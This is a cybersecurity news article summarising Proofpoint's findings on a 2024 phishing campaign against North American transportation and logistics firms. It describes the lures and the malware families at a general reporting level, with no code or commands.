25 September 2024

North American transportation and logistics firms hit with a new phishing campaign


North American transportation and logistics firms hit with a new phishing campaign

Transportation and logistics companies across North America have become the focus of a sophisticated phishing campaign, delivering a variety of information stealers and remote access trojans (RATs). According to security researchers at Proofpoint, the attackers are leveraging compromised legitimate email accounts to insert malicious content into existing email conversations.

Proofpoint said it has identified at least 15 breached email accounts used to carry out these attacks. The email accounts belong to transportation and shipping companies to make phishing messages appear even more legitimate. However, it remains unclear how the attackers initially gained access to these email accounts or who is orchestrating the campaign.

The activity, observed between May and July 2024, predominantly involved malware such as Lumma Stealer, StealC, and NetSupport. In August 2024, the threat actor shifted tactics, employing new infrastructure and a new delivery method. In addition, the malware payloads expanded to include DanaBot and Arechclient2.

One of the primary tactics used by the attackers involves sending phishing messages containing URLs linked to Google Drive. The malicious URLs lead to an internet shortcut file (.URL), or in some cases, the file is directly attached to the message. When the victim opens the file, it leverages Server Message Block (SMB) to access and execute malware from a remote server, installing the malicious software on the victim's system.

Proofpoint notes that most phishing campaigns are relatively small, involving fewer than 20 emails, but they specifically target companies within the transportation and logistics sector.

The attackers were also observed using a method known as ‘ClickFix’ for malware distribution. The technique relies on tricking users into copying, pasting, and executing a Base64-encoded PowerShell script found in the HTML of phishing emails. The script ultimately leads to the download of an MSI file used to install DanaBot.

In a bid to appear more credible, the threat actors have impersonated well-known software used in transportation and logistics operations, including Samsara, AMB Logistic, and Astra TMS.

While Proffpoint had not attributed the analyzed campaign to any specific threat actor, the researchers believe that the culprit behind it is financially motivated.


Back to the list

Latest Posts

Hackers hijack high-level accounts and sensitive data of JAXA’s execs

Hackers hijack high-level accounts and sensitive data of JAXA’s execs

The attackers commandeered roughly 200 accounts, including those of senior officials and members of JAXA’s leadership team.
7 October 2024
Over 100 orgs breached in BabyLockerKZ ransomware attacks

Over 100 orgs breached in BabyLockerKZ ransomware attacks

BabyLockerKZ is an updated variant of the MedusaLocker ransomware.
7 October 2024
Chinese hackers reportedly compromise US court wiretap systems

Chinese hackers reportedly compromise US court wiretap systems

The attack targeted major US telecom companies including Verizon, AT&T, and Lumen Technologies.
7 October 2024